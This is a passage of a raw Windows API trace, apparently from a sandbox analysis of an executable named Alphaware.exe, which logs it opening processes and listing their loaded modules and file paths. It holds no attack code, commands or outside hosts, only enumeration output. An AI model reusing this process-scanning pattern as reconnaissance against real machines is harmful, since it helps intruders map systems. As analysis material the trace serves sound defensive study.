lpmodinfo=0x24a2830*(lpBaseOfDll=0x7fefd790000, SizeOfImage=0xc000, EntryPoint=0x7fefd793e50)) returned 1 [0043.950] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.950] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd790000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="sxssrv.DLL") returned 0xa [0043.951] CoTaskMemFree (pv=0x780780) [0043.951] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.951] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd790000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\sxssrv.DLL" (normalized: "c:\\windows\\system32\\sxssrv.dll")) returned 0x1e [0043.953] CoTaskMemFree (pv=0x780780) [0043.953] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd680000, lpmodinfo=0x24a49f0, cb=0x18 | out: lpmodinfo=0x24a49f0*(lpBaseOfDll=0x7fefd680000, SizeOfImage=0x91000, EntryPoint=0x7fefd681440)) returned 1 [0043.954] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.954] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd680000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="sxs.dll") returned 0x7 [0043.955] CoTaskMemFree (pv=0x780780) [0043.955] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.955] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd680000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")) returned 0x1b [0043.957] CoTaskMemFree (pv=0x780780) [0043.957] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdb50000, lpmodinfo=0x24a6ba0, cb=0x18 | out: lpmodinfo=0x24a6ba0*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0043.958] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.958] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdb50000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0043.959] CoTaskMemFree (pv=0x780780) [0043.960] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.960] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdb50000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0043.961] CoTaskMemFree (pv=0x780780) [0043.961] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd670000, lpmodinfo=0x24a8d60, cb=0x18 | out: lpmodinfo=0x24a8d60*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0043.962] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.962] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd670000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0043.965] CoTaskMemFree (pv=0x780780) [0043.965] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.965] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd670000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0043.966] CoTaskMemFree (pv=0x780780) [0043.966] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff430000, lpmodinfo=0x24aaf30, cb=0x18 | out: lpmodinfo=0x24aaf30*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0043.968] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.968] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff430000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0043.969] CoTaskMemFree (pv=0x780780) [0043.969] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.969] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff430000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0043.971] CoTaskMemFree (pv=0x780780) [0043.971] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefee80000, lpmodinfo=0x24ad218, cb=0x18 | out: lpmodinfo=0x24ad218*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0043.972] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.972] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefee80000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0043.974] CoTaskMemFree (pv=0x780780) [0043.974] CoTaskMemAlloc (cb=0x804) returned 0x780780 [0043.974] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefee80000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0043.976] CoTaskMemFree (pv=0x780780) [0043.976] CloseHandle (hObject=0x218) returned 1 [0043.979] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", nBufferLength=0x105, lpBuffer=0x41e4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", lpFilePart=0x0) returned 0x28 [0043.980] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x934) returned 0x218 [0043.980] EnumProcessModules (in: hProcess=0x218, lphModule=0x24afd38, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x24afd38, lpcbNeeded=0x41eb20) returned 1 [0043.980] GetModuleInformation (in: hProcess=0x218, hModule=0x320000, lpmodinfo=0x24affa8, cb=0x18 | out: lpmodinfo=0x24affa8*(lpBaseOfDll=0x320000, SizeOfImage=0x17000, EntryPoint=0x3214a1)) returned 1 [0043.981] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0043.981] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x320000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="mother.exe") returned 0xa [0043.981] CoTaskMemFree (pv=0x780c10) [0043.981] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0043.982] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x320000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows Portable Devices\\mother.exe" (normalized: "c:\\program files\\windows portable devices\\mother.exe")) returned 0x34 [0043.983] CoTaskMemFree (pv=0x780c10) [0043.983] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x24b21e8, cb=0x18 | out: lpmodinfo=0x24b21e8*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0043.983] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0043.983] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0043.984] CoTaskMemFree (pv=0x780c10) [0043.984] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0043.984] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0043.984] CoTaskMemFree (pv=0x780c10) [0043.984] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x24b43a8, cb=0x18 | out: lpmodinfo=0x24b43a8*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0043.985] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0043.985] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0043.985] CoTaskMemFree (pv=0x780c10) [0043.985] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0043.985] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0043.986] CoTaskMemFree (pv=0x780c10) [0043.986] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x24b6568, cb=0x18 | out: lpmodinfo=0x24b6568*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0043.987] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0043.987] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0043.987] CoTaskMemFree (pv=0x780c10) [0043.987] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0043.987] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0043.988] CoTaskMemFree (pv=0x780c10) [0043.988] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x24b8738, cb=0x18 | out: lpmodinfo=0x24b8738*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0043.989] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0043.989] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0043.990] CoTaskMemFree (pv=0x780c10) [0043.990] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0043.990] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0043.991] CoTaskMemFree (pv=0x780c10) [0043.991] CloseHandle (hObject=0x218) returned 1 [0043.992] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", nBufferLength=0x105, lpBuffer=0x41e4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", lpFilePart=0x0) returned 0x28 [0043.992] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb80) returned 0x218 [0043.992] EnumProcessModules (in: hProcess=0x218, lphModule=0x24bae48, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x24bae48, lpcbNeeded=0x41eb20) returned 1 [0043.993] GetModuleInformation (in: hProcess=0x218, hModule=0x1290000, lpmodinfo=0x24bb0b8, cb=0x18 | out: lpmodinfo=0x24bb0b8*(lpBaseOfDll=0x1290000, SizeOfImage=0x17000, EntryPoint=0x12914a1)) returned 1 [0043.993] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0043.993] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x1290000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="leechftp.exe") returned 0xc [0043.994] CoTaskMemFree (pv=0x780c10) [0043.994] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0043.994] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x1290000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Windows Mail\\leechftp.exe" (normalized: "c:\\program files (x86)\\windows mail\\leechftp.exe")) returned 0x30 [0043.995] CoTaskMemFree (pv=0x780c10) [0043.995] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x24bd2e0, cb=0x18 | out: lpmodinfo=0x24bd2e0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0043.995] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0043.995] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0043.996] CoTaskMemFree (pv=0x780c10) [0043.996] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0043.996] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0043.997] CoTaskMemFree (pv=0x780c10) [0043.997] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x24bf4a0, cb=0x18 | out: lpmodinfo=0x24bf4a0*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0043.997] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0043.997] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0043.998] CoTaskMemFree (pv=0x780c10) [0043.998] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0043.998] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0043.998] CoTaskMemFree (pv=0x780c10) [0043.999] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x24c1660, cb=0x18 | out: lpmodinfo=0x24c1660*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0043.999] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0043.999] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0044.001] CoTaskMemFree (pv=0x780c10) [0044.001] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.001] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0044.001] CoTaskMemFree (pv=0x780c10) [0044.001] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x24c3830, cb=0x18 | out: lpmodinfo=0x24c3830*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0044.002] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.002] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0044.003] CoTaskMemFree (pv=0x780c10) [0044.003] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.003] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0044.004] CoTaskMemFree (pv=0x780c10) [0044.004] CloseHandle (hObject=0x218) returned 1 [0044.005] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", nBufferLength=0x105, lpBuffer=0x41e4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", lpFilePart=0x0) returned 0x28 [0044.006] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x490) returned 0x218 [0044.006] EnumProcessModules (in: hProcess=0x218, lphModule=0x24c5f58, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x24c5f58, lpcbNeeded=0x41eb20) returned 1 [0044.009] GetModuleInformation (in: hProcess=0x218, hModule=0xff130000, lpmodinfo=0x24c61c8, cb=0x18 | out: lpmodinfo=0x24c61c8*(lpBaseOfDll=0xff130000, SizeOfImage=0x14000, EntryPoint=0xff132ce0)) returned 1 [0044.009] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.009] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xff130000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="taskhost.exe") returned 0xc [0044.010] CoTaskMemFree (pv=0x780c10) [0044.010] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.010] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xff130000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\taskhost.exe" (normalized: "c:\\windows\\system32\\taskhost.exe")) returned 0x20 [0044.011] CoTaskMemFree (pv=0x780c10) [0044.011] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x24c83d0, cb=0x18 | out: lpmodinfo=0x24c83d0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0044.012] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.012] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0044.012] CoTaskMemFree (pv=0x780c10) [0044.012] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.012] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0044.013] CoTaskMemFree (pv=0x780c10) [0044.013] GetModuleInformation (in: hProcess=0x218, hModule=0x77710000, lpmodinfo=0x24ca590, cb=0x18 | out: lpmodinfo=0x24ca590*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0044.014] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.014] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77710000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0044.014] CoTaskMemFree (pv=0x780c10) [0044.014] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.014] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77710000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0044.015] CoTaskMemFree (pv=0x780c10) [0044.015] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd910000, lpmodinfo=0x24cc760, cb=0x18 | out: lpmodinfo=0x24cc760*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0044.016] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.016] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd910000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0044.016] CoTaskMemFree (pv=0x780c10) [0044.017] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.017] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd910000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0044.017] CoTaskMemFree (pv=0x780c10) [0044.017] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff100000, lpmodinfo=0x24ce930, cb=0x18 | out: lpmodinfo=0x24ce930*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0044.018] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.018] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff100000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0044.019] CoTaskMemFree (pv=0x780c10) [0044.019] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.019] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff100000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0044.020] CoTaskMemFree (pv=0x780c10) [0044.020] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff760000, lpmodinfo=0x24d0b48, cb=0x18 | out: lpmodinfo=0x24d0b48*(lpBaseOfDll=0x7feff760000, SizeOfImage=0x203000, EntryPoint=0x7feff783330)) returned 1 [0044.021] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.021] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff760000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0044.021] CoTaskMemFree (pv=0x780c10) [0044.022] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.022] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff760000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0044.023] CoTaskMemFree (pv=0x780c10) [0044.023] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff1c0000, lpmodinfo=0x24d2d08, cb=0x18 | out: lpmodinfo=0x24d2d08*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0044.024] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.024] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff1c0000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0044.025] CoTaskMemFree (pv=0x780c10) [0044.025] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.025] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff1c0000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0044.027] CoTaskMemFree (pv=0x780c10) [0044.027] GetModuleInformation (in: hProcess=0x218, hModule=0x77610000, lpmodinfo=0x24d4ec8, cb=0x18 | out: lpmodinfo=0x24d4ec8*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0044.027] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.027] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77610000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0044.028] CoTaskMemFree (pv=0x780c10) [0044.029] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.029] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77610000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0044.030] CoTaskMemFree (pv=0x780c10) [0044.030] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff350000, lpmodinfo=0x24d7088, cb=0x18 | out: lpmodinfo=0x24d7088*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0044.031] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.031] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff350000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0044.032] CoTaskMemFree (pv=0x780c10) [0044.032] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.032] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff350000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0044.033] CoTaskMemFree (pv=0x780c10) [0044.033] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff690000, lpmodinfo=0x24d92d0, cb=0x18 | out: lpmodinfo=0x24d92d0*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0044.034] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.034] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff690000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0044.035] CoTaskMemFree (pv=0x780c10) [0044.035] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.035] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff690000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0044.036] CoTaskMemFree (pv=0x780c10) [0044.036] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdb50000, lpmodinfo=0x24db490, cb=0x18 | out: lpmodinfo=0x24db490*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0044.037] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.037] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdb50000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0044.038] CoTaskMemFree (pv=0x780c10) [0044.039] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.039] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdb50000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0044.040] CoTaskMemFree (pv=0x780c10) [0044.040] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdf90000, lpmodinfo=0x24dd650, cb=0x18 | out: lpmodinfo=0x24dd650*(lpBaseOfDll=0x7fefdf90000, SizeOfImage=0xd7000, EntryPoint=0x7fefdf93274)) returned 1 [0044.041] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.041] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdf90000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0044.043] CoTaskMemFree (pv=0x780c10) [0044.043] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.043] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdf90000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\OLEAUT32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")) returned 0x20 [0044.045] CoTaskMemFree (pv=0x780c10) [0044.045] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff400000, lpmodinfo=0x24df820, cb=0x18 | out: lpmodinfo=0x24df820*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0044.046] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.046] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff400000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0044.047] CoTaskMemFree (pv=0x780c10) [0044.047] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.047] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff400000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.DLL" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0044.049] CoTaskMemFree (pv=0x780c10) [0044.049] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff9d0000, lpmodinfo=0x24e19e0, cb=0x18 | out: lpmodinfo=0x24e19e0*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0044.051] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.051] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff9d0000, lpBaseName=0x780c10, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0044.052] CoTaskMemFree (pv=0x780c10) [0044.052] CoTaskMemAlloc (cb=0x804) returned 0x780c10 [0044.052] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff9d0000, lpFilename=0x780c10, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0044.053] CoTaskMemFree (pv=0x780c10) [0044.053] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd670000, lpmodinfo=0x24e3ba0, cb=0x18 | out: lpmodinfo=0x24e3ba0*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0044.055] CoTaskMemAlloc 